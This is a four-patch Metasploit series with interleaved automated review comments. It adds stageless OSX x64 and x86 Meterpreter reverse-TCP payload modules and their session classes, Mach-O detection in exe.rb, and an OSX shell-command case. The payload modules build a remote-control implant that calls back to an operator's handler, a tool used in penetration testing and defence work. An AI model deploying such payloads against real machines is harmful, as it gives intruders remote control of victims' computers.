From d333077308e865034571a46a3fe9375612c2a57b Mon Sep 17 00:00:00 2001
From: Tim
Date: Tue, 23 May 2017 09:47:23 +0800
Subject: [PATCH 1/4] osx meterpreter
---
 lib/msf/base/sessions/meterpreter_x64_osx.rb | 29 ++++++++++++++
 lib/msf/util/exe.rb | 28 ++++++++-----
 .../osx/x64/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++
 3 files changed, 87 insertions(+), 10 deletions(-)
 create mode 100644 lib/msf/base/sessions/meterpreter_x64_osx.rb
 create mode 100644 modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
diff --git a/lib/msf/base/sessions/meterpreter_x64_osx.rb b/lib/msf/base/sessions/meterpreter_x64_osx.rb
new file mode 100644
index 000000000000..2e507e90550b
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
+ def supports_ssl?
+ false
+ end
+ def supports_zlib?
+ false
+ end
+ def initialize(rstream, opts={})
+ super
+ self.base_platform = 'osx'
+ self.base_arch = ARCH_X64
+ end
+end
+
+end
+end
+
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index d41f3876e757..d05f043ed793 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -106,7 +106,7 @@ def self.to_zip(files)
 # @return [String]
 # @return [NilClass]
 def self.to_executable(framework, arch, plat, code = '', opts = {})
- if elf? code
+ if elf? code or macho? code
 return code
 end
 
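Review bot: Meterpreter_x64_OSX consists only of the two transport predicates and the platform/arch pair set in initialize, and PATCH 3/4 adds Meterpreter_x86_OSX that repeats the same three methods with ARCH_X86; a single OSX session class (with the arch supplied by the subclass or by opts) would keep the two copies from drifting apart. The `###` header is generic and does not say why both predicates are overridden; a line such as `# OSX (x64) Meterpreter session backed by Mettle; the session runs without SSL or zlib (supports_ssl?/supports_zlib? return false).` would tell a reader what is different about this session type. Minor style: `opts={}` should be `opts = {}`, matching `info = {}` in the payload module added by the same patch.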
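Review bot: The new condition `if elf? code or macho? code` uses `or`, whose low precedence is a known trap and which idiomatic Ruby reserves for control flow; prefer `if elf?(code) || macho?(code)`. The YARD block just above (`@return [String]` / `@return [NilClass]`) still reads as though code is always wrapped, so a comment such as `# Code that is already an ELF or Mach-O image is returned unchanged; its embedded CPU type is not compared with arch or plat.` would document the pass-through and the fact that, as with the existing ELF case, an arch mismatch is not detected. to_executable's body continues outside the hunk.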
@@ -2122,15 +2122,19 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
 end
 end
 when 'macho', 'osx-app'
- macho = case arch
- when ARCH_X86,nil
- to_osx_x86_macho(framework, code, exeopts)
- when ARCH_X64
- to_osx_x64_macho(framework, code, exeopts)
- when ARCH_ARMLE
- to_osx_arm_macho(framework, code, exeopts)
- when ARCH_PPC
- to_osx_ppc_macho(framework, code, exeopts)
+ if macho? code
+ macho = code
+ else
+ macho = case arch
+ when ARCH_X86,nil
+ to_osx_x86_macho(framework, code, exeopts)
+ when ARCH_X64
+ to_osx_x64_macho(framework, code, exeopts)
+ when ARCH_ARMLE
+ to_osx_arm_macho(framework, code, exeopts)
+ when ARCH_PPC
+ to_osx_ppc_macho(framework, code, exeopts)
+ end
 end
 fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
 when 'vba'
@@ -2258,6 +2262,10 @@ def self.elf?(code)
 code[0..3] == "\x7FELF"
 end
 
+ def self.macho?(code)
+ code[0..3] == "\xCF\xFA\xED\xFE"
+ end
+
 end
 end
 end
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
new file mode 100644
index 000000000000..dbb741e67cf9
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
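Review bot: In the 'macho'/'osx-app' branch a pre-built Mach-O is used verbatim without checking its CPU type against `arch`, so a 32-bit or fat image requested as ARCH_X64 (or the reverse) is silently wrapped into an .app of the wrong architecture; at minimum a comment like `# A pre-built Mach-O (e.g. Mettle) is used as-is; its cputype is not validated against arch` should say so, and reading the thin header's cputype at offset 4 would let the method raise on a mismatch. Stylistically `macho` is now assigned in two places; `macho = macho?(code) ? code : case arch ... end` keeps a single assignment. The `case` still has no `else`, so an unsupported arch leaves `macho` nil and `to_osx_app(nil)` is reached on the next line — pre-existing, but worth an explicit `else raise ArgumentError, ...` now that the branch is being reworked. to_executable_fmt starts and ends outside the hunk.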
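Review bot: `macho?` compares `code[0..3]` with a literal containing bytes above 0x7F, and Ruby's `String#==` is false when two non-ASCII strings carry different encodings, so the check only works if exe.rb's source-encoding comment makes the literal binary (`elf?`'s `"\x7FELF"` is 7-bit and never hits this). Writing the comparison as `code[0..3].b == "\xCF\xFA\xED\xFE".b`, or comparing integers via `code[0..3].unpack('N').first == 0xCFFAEDFE`, makes it independent of the file's encoding. Only the little-endian 64-bit magic is recognised, so 32-bit images and the big-endian PPC images this same file still builds via to_osx_ppc_macho (bytes `\xFE\xED\xFA\xCE`) are not; PATCH 4/4 adds the 32-bit and fat magics but still omits the big-endian form. A one-line doc, e.g. `# True when code starts with a Mach-O magic (mach-o/loader.h); nothing past the first four bytes is validated.`, would also help.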
@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x64_osx'
+
+module MetasploitModule
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'OSX Meterpreter, Reverse TCP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::Meterpreter_x64_OSX
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'tcp'}
+ MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec
+ end
+end
From a9e6df6f158b375ad2da721f467902df8bfdba34 Mon Sep 17 00:00:00 2001
From: Tim
Date: Fri, 26 May 2017 15:55:14 +0800
Subject: [PATCH 2/4] fix shell command on osx meterpreter
---
 .../meterpreter/ui/console/command_dispatcher/stdapi/sys.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index acfe73732852..774617bcbe1d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
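Review bot: The `'Name'` 'OSX Meterpreter, Reverse TCP Inline' does not mention the architecture, and PATCH 3/4 registers the x86 module under exactly the same string, so the two payloads are indistinguishable in listings except by path; `'Name' => 'OSX x64 Meterpreter, Reverse TCP Inline'` here (and the x86 counterpart there) would disambiguate them. The `'Description'` could likewise note that this is the x86_64 Mettle build, since the target triple 'x86_64-apple-darwin' is the only place the architecture is spelled out. Minor style: `opts = {scheme: 'tcp'}` is used once and can be passed inline as `generate_config(scheme: 'tcp')`, and `.to_binary :exec` reads better with parentheses as `.to_binary(:exec)`.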
@@ -257,7 +257,7 @@ def cmd_shell(*args)
 print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
 cmd_execute("-f", path, "-c", "-H", "-i")
 end
- when 'linux'
+ when 'linux', 'osx'
 # Don't expand_path() this because it's literal anyway
 path = "/bin/sh"
 cmd_execute("-f", path, "-c", "-i")
From 1582d3a90261aa2e03d6f7e73dffbb98b48ba25e Mon Sep 17 00:00:00 2001
From: Tim
Date: Fri, 26 May 2017 15:55:42 +0800
Subject: [PATCH 3/4] support i386
---
 lib/msf/base/sessions/meterpreter_x86_osx.rb | 29 ++++++++++++++
 .../osx/x86/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++
 2 files changed, 69 insertions(+)
 create mode 100644 lib/msf/base/sessions/meterpreter_x86_osx.rb
 create mode 100644 modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb
diff --git a/lib/msf/base/sessions/meterpreter_x86_osx.rb b/lib/msf/base/sessions/meterpreter_x86_osx.rb
new file mode 100644
index 000000000000..c7e25efac942
--- /dev/null
+++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
+ def supports_ssl?
+ false
+ end
+ def supports_zlib?
+ false
+ end
+ def initialize(rstream, opts={})
+ super
+ self.base_platform = 'osx'
+ self.base_arch = ARCH_X86
+ end
+end
+
+end
+end
+
diff --git a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb
new file mode 100644
index 000000000000..756e3f5e738f
--- /dev/null
+++ b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb
@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_x86_osx'
+
+module MetasploitModule
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'OSX Meterpreter, Reverse TCP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::Meterpreter_x86_OSX
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'tcp'}
+ MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec
+ end
+end
From 32a83e0d30eeb4c8c2372d90620f2153d293dafe Mon Sep 17 00:00:00 2001
From: Tim
Date: Tue, 30 May 2017 14:00:24 +0800
Subject: [PATCH 4/4] update macho check for 32bit + fat
---
 lib/msf/util/exe.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index d05f043ed793..9bbaba952ef4 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -2263,7 +2263,7 @@ def self.elf?(code)
 end
 
 def self.macho?(code)
- code[0..3] == "\xCF\xFA\xED\xFE"
+ code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE"
 end
 
 end
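Review bot: The added `"\xCA\xFE\xBA\xBE"` branch is the fat/universal magic, but 0xCAFEBABE is also the magic of Java class files, so a .class handed to to_executable or the 'macho' branch of to_executable_fmt is now passed through as if it were a Mach-O; Apple's tooling disambiguates by requiring the big-endian arch count at offset 4 to be small (a class file has its major_version, at least 45, in that position). The three repeated `code[0..3]` slices are better expressed as a frozen table of magics compared under a binary encoding (`.b`), which also makes it straightforward to include the big-endian `\xFE\xED\xFA\xCE` form of the PPC images this file still builds. The `end`s closing the enclosing modules are in the hunk, but the class header and the rest of the file are not.
```ruby
  # Mach-O magic numbers as stored on disk (mach-o/loader.h, mach-o/fat.h).
  MACHO_MAGICS = [
    "\xCF\xFA\xED\xFE", # MH_MAGIC_64, little-endian (x86_64)
    "\xCE\xFA\xED\xFE", # MH_MAGIC, little-endian (i386)
    "\xFE\xED\xFA\xCE", # MH_MAGIC, big-endian (ppc)
    "\xCA\xFE\xBA\xBE"  # FAT_MAGIC (universal); same bytes as a Java class file
  ].map(&:b).freeze

  # True when code begins with a Mach-O magic. For the fat magic the big-endian
  # arch count at offset 4 must be small; Java class files carry major_version >= 45
  # there, which rules them out. Nothing beyond these bytes is validated.
  def self.macho?(code)
    magic = code[0..3].to_s.b
    return false unless MACHO_MAGICS.include?(magic)
    return true unless magic == "\xCA\xFE\xBA\xBE".b
    nfat_arch = code[4..7].to_s.unpack('N').first
    !nfat_arch.nil? && nfat_arch > 0 && nfat_arch < 45
  end
```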